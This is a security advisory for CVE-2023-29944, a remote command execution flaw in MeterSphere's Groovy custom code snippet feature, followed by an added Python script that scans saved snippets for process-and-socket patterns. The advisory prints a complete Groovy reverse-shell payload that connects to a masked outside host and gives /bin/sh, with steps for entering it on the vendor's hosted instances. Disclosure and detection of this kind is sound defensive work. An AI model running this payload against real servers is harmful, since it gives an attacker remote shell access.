CVE-2023-29944

High
fit2-zhao published GHSA-5473-9v2g-rpqm May 25, 2023

Package

No package listed

Affected versions

< v1.20.22 LTS

Patched versions

v1.20.23 LTS | v2.10 LTS

Description

Summary

MeterSphere v1.20.20-lts-79d354a6 is vulnerable to Remote Command Execution. A reverse shell can be launched as a system command through the custom code snippet function of the MeterSphere system workbench.

Register an account, then enter the workbench:
https://www.metersphere.com/index

Provide test account :

Log in and click to enter the workbench,

then change the URL to https://cloud2.metersphere.com/#/project/code/segment

Description

MeterSphere allows RCE through custom function code.

The location is Workbench > Project Settings > Custom Code Snippets.
Under Project Settings > Custom Code Snippets, select Groovy as the code language and enter the following to receive the reverse shell:

// PoC.js

Groovy code:

String host="*.*.*.*";int port=42239;String cmd="/bin/sh";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); 

https://cloud.metersphere.com/#/project/code/segment

https://demo.metersphere.com/#/project/code/segment

Screenshots of the example:
https://hacku.top/wl/?id=WTuOyEeDyj2JsO5Toxd8wr242chVgSc1
https://hacku.top/wl/?id=Z2VBfKJZ2Fx0vMoXEVGo8EzMHAdlVlau
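A triage pass a defender can run over saved custom code snippets to find ones that reach the same primitives as the PoC above. This is an added example, not MeterSphere code: the snippet names, the name-to-script mapping and the pattern list are assumptions, and how snippets are exported from an instance is left out. It is a pattern heuristic for review queues, so upgrading to a patched version remains the fix.

```python
import re

# Primitive families that let a Groovy snippet reach the host OS or network.
# Constructed heuristics for triage; not an exhaustive list.
PATTERNS = {
    "process": re.compile(
        r"\bProcessBuilder\b"
        r"|\bRuntime\s*\.\s*getRuntime\s*\(\s*\)\s*\.\s*exec\s*\("
        r"|\.\s*execute\s*\("  # Groovy String/List .execute()
    ),
    "socket": re.compile(r"\bnew\s+(?:java\.net\.)?(?:Server)?Socket\s*\("),
}

# Matches string literals first so that "//" inside a URL is not taken as a comment.
TOKEN = re.compile(r'"(?:\\.|[^"\\])*"|\'(?:\\.|[^\'\\])*\'|//[^\n]*|/\*.*?\*/', re.S)

def strip_comments(code):
    """Drop // and /* */ comments while keeping string literals intact."""
    return TOKEN.sub(lambda m: " " if m.group().startswith("/") else m.group(), code)

def audit_snippets(snippets):
    """Map snippet name -> 'high' (process and socket together) or 'review'."""
    findings = {}
    for name, script in snippets.items():
        code = strip_comments(script)
        hits = {family for family, rx in PATTERNS.items() if rx.search(code)}
        if hits == {"process", "socket"}:
            findings[name] = "high"    # same shape as the PoC in this advisory
        elif hits:
            findings[name] = "review"  # one primitive alone still needs an owner
    return findings

# Constructed snippet bodies, not taken from any real project.
SAMPLES = {
    "parse-response": 'def body = new groovy.json.JsonSlurper().parseText(resp)\n'
                      'vars.put("id", body.id.toString())',
    "cleanup": '// new ProcessBuilder("rm") was removed\n'
               'log.info("see http://example.test/docs")',
    "ping-helper": 'def out = ["ping", "-c", "1", "127.0.0.1"].execute().text',
    "bridge": 'Process p = new ProcessBuilder(cmd).start()\n'
              'Socket s = new Socket(host, port)',
}

if __name__ == "__main__":
    for name, level in audit_snippets(SAMPLES).items():
        print(f"{level:6} {name}")
```
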

Severity

High

CVE ID

CVE-2023-29944

Weaknesses

No CWEs

Credits